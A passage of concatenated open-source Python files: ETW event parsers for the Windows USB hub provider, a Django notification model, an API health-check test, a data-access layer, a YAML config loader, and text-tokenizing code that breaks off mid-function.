@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=119, version=0)
class Microsoft_Windows_USB_USBHUB_119_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=120, version=0)
class Microsoft_Windows_USB_USBHUB_120_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=121, version=0)
class Microsoft_Windows_USB_USBHUB_121_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=122, version=0)
class Microsoft_Windows_USB_USBHUB_122_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=123, version=0)
class Microsoft_Windows_USB_USBHUB_123_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=130, version=0)
class Microsoft_Windows_USB_USBHUB_130_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=139, version=0)
class Microsoft_Windows_USB_USBHUB_139_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=140, version=0)
class Microsoft_Windows_USB_USBHUB_140_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=149, version=0)
class Microsoft_Windows_USB_USBHUB_149_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=150, version=0)
class Microsoft_Windows_USB_USBHUB_150_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=151, version=0)
class Microsoft_Windows_USB_USBHUB_151_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=159, version=0)
class Microsoft_Windows_USB_USBHUB_159_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=160, version=0)
class Microsoft_Windows_USB_USBHUB_160_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=161, version=0)
class Microsoft_Windows_USB_USBHUB_161_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=169, version=0)
class Microsoft_Windows_USB_USBHUB_169_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=170, version=0)
class Microsoft_Windows_USB_USBHUB_170_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=171, version=0)
class Microsoft_Windows_USB_USBHUB_171_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=172, version=0)
class Microsoft_Windows_USB_USBHUB_172_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=173, version=0)
class Microsoft_Windows_USB_USBHUB_173_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=174, version=0)
class Microsoft_Windows_USB_USBHUB_174_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=175, version=0)
class Microsoft_Windows_USB_USBHUB_175_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=176, version=0)
class Microsoft_Windows_USB_USBHUB_176_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=177, version=0)
class Microsoft_Windows_USB_USBHUB_177_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=178, version=0)
class Microsoft_Windows_USB_USBHUB_178_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=179, version=0)
class Microsoft_Windows_USB_USBHUB_179_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=180, version=0)
class Microsoft_Windows_USB_USBHUB_180_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=181, version=0)
class Microsoft_Windows_USB_USBHUB_181_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=183, version=0)
class Microsoft_Windows_USB_USBHUB_183_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=184, version=0)
class Microsoft_Windows_USB_USBHUB_184_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=185, version=0)
class Microsoft_Windows_USB_USBHUB_185_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=189, version=0)
class Microsoft_Windows_USB_USBHUB_189_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=190, version=0)
class Microsoft_Windows_USB_USBHUB_190_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=199, version=0)
class Microsoft_Windows_USB_USBHUB_199_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=200, version=0)
class Microsoft_Windows_USB_USBHUB_200_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=209, version=0)
class Microsoft_Windows_USB_USBHUB_209_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=210, version=0)
class Microsoft_Windows_USB_USBHUB_210_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int32sl,
"fid_USBHUB_Hub" / Double,
"fid_PortNumber" / Int32ul,
"fid_Class" / Int32ul,
"fid_NtStatus" / Int32ul,
"fid_UsbdStatus" / Int32ul,
"fid_DebugText" / CString
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=211, version=0)
class Microsoft_Windows_USB_USBHUB_211_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_PortStatusChange" / Int16ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=212, version=0)
class Microsoft_Windows_USB_USBHUB_212_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_TimerTag" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=213, version=0)
class Microsoft_Windows_USB_USBHUB_213_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_TimerTag" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=214, version=0)
class Microsoft_Windows_USB_USBHUB_214_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_TimerTag" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=220, version=0)
class Microsoft_Windows_USB_USBHUB_220_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=229, version=0)
class Microsoft_Windows_USB_USBHUB_229_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=230, version=0)
class Microsoft_Windows_USB_USBHUB_230_0(Etw):
pattern = Struct(
"fid_TimeElapsedBeforeLogStart" / Int64ul,
"fid_USBHUB_HC" / Int32ul,
"fid_USBHUB_Hub" / Int8ul,
"fid_PortNumber" / Int32ul,
"fid_Class" / Int32ul,
"fid_NtStatus" / Int32ul,
"fid_UsbdStatus" / Int32ul,
"fid_DebugText" / CString
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=231, version=0)
class Microsoft_Windows_USB_USBHUB_231_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=232, version=0)
class Microsoft_Windows_USB_USBHUB_232_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=233, version=0)
class Microsoft_Windows_USB_USBHUB_233_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=234, version=0)
class Microsoft_Windows_USB_USBHUB_234_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
|
care/facility/models/notification.py | gigincg/care | 189 | 32898 | import enum
from django.db import models
from care.facility.models import FacilityBaseModel
from care.users.models import User
from django.contrib.postgres.fields import JSONField
class Notification(FacilityBaseModel):
class EventType(enum.Enum):
SYSTEM_GENERATED = 50
CUSTOM_MESSAGE = 100
EventTypeChoices = [(e.value, e.name) for e in EventType]
class Medium(enum.Enum):
SYSTEM = 0
SMS = 100
WHATSAPP = 200
MediumChoices = [(e.value, e.name) for e in Medium]
class Event(enum.Enum):
MESSAGE = 0
PATIENT_CREATED = 20
PATIENT_UPDATED = 30
PATIENT_DELETED = 40
PATIENT_CONSULTATION_CREATED = 50
PATIENT_CONSULTATION_UPDATED = 60
PATIENT_CONSULTATION_DELETED = 70
INVESTIGATION_SESSION_CREATED = 80
INVESTIGATION_UPDATED = 90
PATIENT_FILE_UPLOAD_CREATED = 100
CONSULTATION_FILE_UPLOAD_CREATED = 110
PATIENT_CONSULTATION_UPDATE_CREATED = 120
PATIENT_CONSULTATION_UPDATE_UPDATED = 130
PATIENT_CONSULTATION_ASSIGNMENT = 140
SHIFTING_UPDATED = 200
EventChoices = [(e.value, e.name) for e in Event]
intended_for = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, related_name="notification_intended_for",
)
medium_sent = models.IntegerField(choices=MediumChoices, default=Medium.SYSTEM.value)
caused_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, related_name="notification_caused_by",)
read_at = models.DateTimeField(null=True, blank=True)
event_type = models.IntegerField(choices=EventTypeChoices, default=EventType.SYSTEM_GENERATED.value)
event = models.IntegerField(choices=EventChoices, default=Event.MESSAGE.value)
message = models.TextField(max_length=2000, null=True, default=None)
caused_objects = JSONField(null=True, blank=True, default=dict)
|
web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 151 | 32919 | <reponame>marcelomansur/maria-quiteria
import pytest
from django.urls import reverse
class TestHealthCheck:
def test_return_success_when_accessing_health_check(self, api_client, url):
response = api_client.get(url, format="json")
assert response.status_code == 200
assert list(response.json().keys()) == ["status", "time"]
assert response.json().get("status") == "available"
def test_return_forbidden_when_trying_to_anonymously_access_a_restricted_route(
self, api_client
):
url = reverse("gazettes-list")
response = api_client.get(url)
assert response.status_code == 403
@pytest.mark.django_db
def test_return_success_when_accessing_a_restricted_route_with_credentials(
self, api_client_authenticated
):
url = reverse("gazettes-list")
response = api_client_authenticated.get(url)
assert response.status_code == 200
|
datmo/core/storage/local/dal.py | awesome-archive/datmo | 331 | 32941 | <filename>datmo/core/storage/local/dal.py
import os
from kids.cache import cache
from datetime import datetime
from datmo.core.util.i18n import get as __
from datmo.core.entity.model import Model
from datmo.core.entity.code import Code
from datmo.core.entity.environment import Environment
from datmo.core.entity.file_collection import FileCollection
from datmo.core.entity.task import Task
from datmo.core.entity.snapshot import Snapshot
from datmo.core.entity.user import User
from datmo.core.util.exceptions import InputError, EntityNotFound, MoreThanOneEntityFound, DALNotInitialized
from datmo.core.util.misc_functions import create_unique_hash
from datmo.core.storage.driver.blitzdb_dal_driver import BlitzDBDALDriver
class LocalDAL():
"""
LocalDAL is a local DAL object that stores info locally. DAL stands for 'data access layer' and serves as a storage for
all entities.
Parameters
----------
driver_type : str
type of driver to pull from
driver_options : dict
options for the DALdriver class
driver : datmo.core.storage.driver.DALDriver, optional
Instantiated DAL driver used for backend storage for entities
Attributes
----------
driver_type : str
driver_options : dict
driver : datmo.core.storage.driver.DALDriver
Instantiated DAL driver used for backend storage for entities
is_initialized : bool
model : ModelMethods
code : CodeMethods
environment : EnvironmentMethods
file_collection : FileCollectionMethods
task : TaskMethods
snapshot : SnapshotMethods
user : UserMethods
Methods
-------
init()
initialize the dal
"""
def __init__(self, driver_type, driver_options, driver=None):
self.driver_type = driver_type
self.driver_options = driver_options
self.driver = driver
self._is_initialized = self.is_initialized
@property
def is_initialized(self):
if os.path.isdir(self.driver_options['connection_string']):
self._is_initialized = True
# set the driver so it is available
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
return self._is_initialized
self._is_initialized = False
return self._is_initialized
@property
def model(self):
"""Model CRUD methods
Returns
-------
ModelMethods
Specific set of CRUD functions for model
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return ModelMethods(self.driver)
@property
def code(self):
"""Code CRUD methods
Returns
-------
CodeMethods
Specific set of CRUD functions for code
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return CodeMethods(self.driver)
@property
def environment(self):
"""Environment CRUD methods
Returns
-------
EnvironmentMethods
Specific set of CRUD functions for environment
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return EnvironmentMethods(self.driver)
@property
def file_collection(self):
"""FileCollection CRUD methods
Returns
-------
FileCollectionMethods
Specific set of CRUD functions for file collection
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return FileCollectionMethods(self.driver)
@cache
@property
def task(self):
"""Task CRUD methods
Returns
-------
TaskMethods
Specific set of CRUD functions for task
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return TaskMethods(self.driver)
@cache
@property
def snapshot(self):
"""Snapshot CRUD methods
Returns
-------
SnapshotMethods
Specific set of CRUD functions for snapshot
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return SnapshotMethods(self.driver)
@cache
@property
def user(self):
"""User CRUD methods
Returns
-------
UserMethods
Specific set of CRUD functions for user
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return UserMethods(self.driver)
def init(self):
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
class EntityMethodsCRUD(object):
def __init__(self, collection, entity_class, driver):
self.collection = collection
self.entity_class = entity_class
self.driver = driver
def get_by_id(self, entity_id):
obj = self.driver.get(self.collection, entity_id)
return self.entity_class(obj)
def get_by_shortened_id(self, shortened_entity_id):
obj = self.driver.get_by_shortened_id(self.collection,
shortened_entity_id)
return self.entity_class(obj)
def create(self, datmo_entity):
# translate datmo_entity to a standard dictionary (document) to be stored
if hasattr(datmo_entity, 'to_dictionary'):
dict_obj = datmo_entity.to_dictionary()
else:
dict_obj = self.entity_class(datmo_entity).to_dictionary()
# create a unique hash from misc_functions.py
# TODO: find efficient way to get previous hash for entity
# latest_entity = self.query({"id": latest})
# dict_obj['id'] = create_unique_hash(base_hash=latest_entity['id'])
dict_obj['id'] = dict_obj['id'] if 'id' in dict_obj.keys() and dict_obj['id'] else \
create_unique_hash()
response = self.driver.set(self.collection, dict_obj)
entity_instance = self.entity_class(response)
return entity_instance
def update(self, datmo_entity):
# translate datmo_entity to a standard dictionary (document) to be stored
if hasattr(datmo_entity, 'to_dictionary'):
dict_obj = datmo_entity.to_dictionary()
else:
if 'id' not in list(datmo_entity) or not datmo_entity['id']:
raise InputError(__("error", "storage.local.dal.update"))
# Aggregate original object and new object into dict_obj var
new_dict_obj = datmo_entity
original_datmo_entity = self.get_by_id(datmo_entity['id'])
dict_obj = {}
for key, value in original_datmo_entity.to_dictionary().items():
if key in list(new_dict_obj):
dict_obj[key] = new_dict_obj[key]
else:
dict_obj[key] = getattr(original_datmo_entity, key)
# set updated_at always
dict_obj['updated_at'] = datetime.utcnow()
response = self.driver.set(self.collection, dict_obj)
entity_instance = self.entity_class(response)
return entity_instance
def delete(self, entity_id):
return self.driver.delete(self.collection, entity_id)
def query(self, query_params, sort_key=None, sort_order=None):
return [
self.entity_class(item) for item in self.driver.query(
self.collection, query_params, sort_key, sort_order)
]
def findOne(self, query_params):
results = self.query(query_params)
if len(results) == 0:
raise EntityNotFound()
if len(results) > 1:
raise MoreThanOneEntityFound()
return results[0]
#
# https://stackoverflow.com/questions/1713038/super-fails-with-error-typeerror-argument-1-must-be-type-not-classobj
#
#
# Datmo Entity methods
#
class ModelMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(ModelMethods, self).__init__('model', Model, driver)
class CodeMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(CodeMethods, self).__init__('code', Code, driver)
class EnvironmentMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(EnvironmentMethods, self).__init__('environment', Environment,
driver)
class FileCollectionMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(FileCollectionMethods, self).__init__('file_collection',
FileCollection, driver)
class TaskMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(TaskMethods, self).__init__('task', Task, driver)
class SnapshotMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(SnapshotMethods, self).__init__('snapshot', Snapshot, driver)
class UserMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(UserMethods, self).__init__('user', User, driver)
|
rl_algorithms/utils/config.py | medipixel/rl_algorithms | 466 | 32948 | <gh_stars>100-1000
import collections.abc as collections_abc
import os.path as osp
from addict import Dict
import yaml
class ConfigDict(Dict):
def __missing__(self, name):
raise KeyError(name)
def __getattr__(self, name):
try:
value = super(ConfigDict, self).__getattr__(name)
except KeyError:
ex = AttributeError(
"'{}' object has no attribute '{}'".format(
self.__class__.__name__, name
)
)
except Exception as e:
ex = e
else:
return value
raise ex
def __setitem__(self, name, value):
if isinstance(value, dict):
value = ConfigDict(value)
super(ConfigDict, self).__setitem__(name, value)
def add_args(parser, cfg, prefix=""):
for k, v in cfg.items():
if isinstance(v, str):
parser.add_argument("--" + prefix + k)
elif isinstance(v, int):
parser.add_argument("--" + prefix + k, type=int)
elif isinstance(v, float):
parser.add_argument("--" + prefix + k, type=float)
elif isinstance(v, bool):
parser.add_argument("--" + prefix + k, action="store_true")
elif isinstance(v, dict):
add_args(parser, v, k + ".")
elif isinstance(v, collections_abc.Iterable):
parser.add_argument("--" + prefix + k, type=type(v[0]), nargs="+")
else:
print("connot parse key {} of type {}".format(prefix + k, type(v)))
return parser
class YamlConfig:
"""Manager of ConfigDict from yaml."""
def __init__(self, config_paths: dict):
"""Make ConfigDict from yaml path."""
self.cfg = ConfigDict()
for key, path in config_paths.items():
self.cfg[key] = self._yaml_to_config_dict(path)
@staticmethod
def _yaml_to_config_dict(path: str) -> ConfigDict:
"""Return ConfigDict from yaml."""
try:
with open(path) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
except FileNotFoundError:
with open(osp.expanduser(path)) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
return ConfigDict(data)
def get_config_dict(self):
return self.cfg
|
passage/preprocessing.py | vishalbelsare/Passage | 597 | 32950 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import string
from collections import Counter
import numpy as np
import theano
import theano.tensor as T
punctuation = set(string.punctuation)
punctuation.add('\n')
punctuation.add('\t')
punctuation.add(u'’')
punctuation.add(u'‘')
punctuation.add(u'“')
punctuation.add(u'”')
punctuation.add(u'´')
punctuation.add('')
def one_hot(X, n=None, negative_class=0.):
X = np.asarray(X).flatten()
if n is None:
n = np.max(X) + 1
Xoh = np.ones((len(X), n)) * negative_class
Xoh[np.arange(len(X)), X] = 1.
return Xoh
def flatten(l):
return [item for sublist in l for item in sublist]
def lbf(l,b):
return [el for el, condition in zip(l, b) if condition]
def list_index(l, idxs):
return [l[idx] for idx in idxs]
def tokenize(text):
tokenized = []
w = ''
for t in text:
if t in punctuation:
tokenized.append(w)
tokenized.append(t)
w = ''
elif t == ' ':
tokenized.append(w)
w = ''
else:
w += t
if w != '':
tokenized.append(w)
tokenized = [token for token in tokenized if token]
return tokenized
def token_encoder(texts, max_features=9997, min_df=10):
df = {}
for text in texts:
tokens = set(text)
for token in tokens:
if token in df:
df[token] += 1
else:
df[token] = 1
k, v = df.keys(), np.asarray(df.values())
valid = v >= min_df
k = lbf(k, valid)
v = v[valid]
sort_mask = np.argsort(v)[::-1]
k = list_index(k, sort_mask)[:max_features]
v = v[sort_mask][:max_features]
xtoi = dict(zip(k, range(3, len(k)+3)))
return xtoi
def standardize_targets(Y, cost):
Y = np.asarray(Y)
ndim = len(Y.shape)
if ndim == 1:
Y = Y.reshape(-1, 1)
if Y.shape[1] == 1 and cost.__name__ == 'CategoricalCrossEntropy':
Y = one_hot(Y, negative_class=0.)
if Y.shape[1] == 1 and 'Hinge' in cost.__name__:
if len(np.unique(Y)) > 2:
Y = one_hot(Y, negative_class=-1.)
else:
Y[Y==0] -= 1
return Y
class Tokenizer(object):
"""
For converting lists of text into tokens used by Passage models.
max_features sets the maximum number of tokens (all others are mapped to UNK)
min_df sets the minimum number of documents a token must appear in to not get mapped to UNK
lowercase controls whether the text is lowercased or not
character sets whether the tokenizer works on a character or word level
Usage:
>>> from passage.preprocessing import Tokenizer
>>> example_text = ['This. is.', 'Example TEXT', 'is text']
>>> tokenizer = Tokenizer(min_df=1, lowercase=True, character=False)
>>> tokenized = tokenizer.fit_transform(example_text)
>>> tokenized
[[7, 5, 3, 5], [6, 4], [3, 4]]
>>> tokenizer.inverse_transform(tokenized)
['this . is .', 'example text', 'is text']
"""
def __init__(self, max_features=9997, min_df=10, lowercase=True, character=False):
self.max_features = max_features
self.min_df = min_df
self.lowercase = lowercase
self.character = character
def fit(self, texts):
if self.lowercase:
texts = [text.lower() for text in texts]
if self.character:
tokens = [list(text) for text in texts]
else:
tokens = [tokenize(text) for text in texts]
self.encoder = token_encoder(tokens, max_features=self.max_features-3, min_df=self.min_df)
self.encoder['PAD'] = 0
self.encoder['END'] = 1
self.encoder['UNK'] = 2
self.decoder = dict(zip(self.encoder.values(), self.encoder.keys()))
self.n_features = len(self.encoder)
return self
def transform(self, texts):
if self.lowercase:
texts = [text.lower() for text in texts]
if self.character:
texts = [list(text) for text in texts]
else:
texts = [tokenize(text) for text in texts]
tokens = [[self.encoder.get(token, 2) for token in text] for text in texts]
return tokens
def fit_transform(self, texts):
self.fit(texts)
tokens = self.transform(texts)
return tokens
def inverse_transform(self, codes):
if self.character:
joiner = ''
else:
joiner = ' '
return [joiner.join([self.decoder[token] for token in code]) for code in codes]
class LenFilter(object):
def __init__(self, max_len=1000, min_max_len=100, percentile=99):
self.max_len = max_len
self.percentile = percentile
self.min_max_len = min_max_len
def filter(self, *data):
lens = [len(seq) for seq in data[0]]
if self.percentile > 0:
max_len = np.percentile(lens, self.percentile)
max_len = np.clip(max_len, self.min_max_len, self.max_len)
else:
max_len = self.max_len
valid_idxs = [i for i, l in enumerate(lens) if l <= max_len]
if len(data) == 1:
return list_index(data[0], valid_idxs)
else:
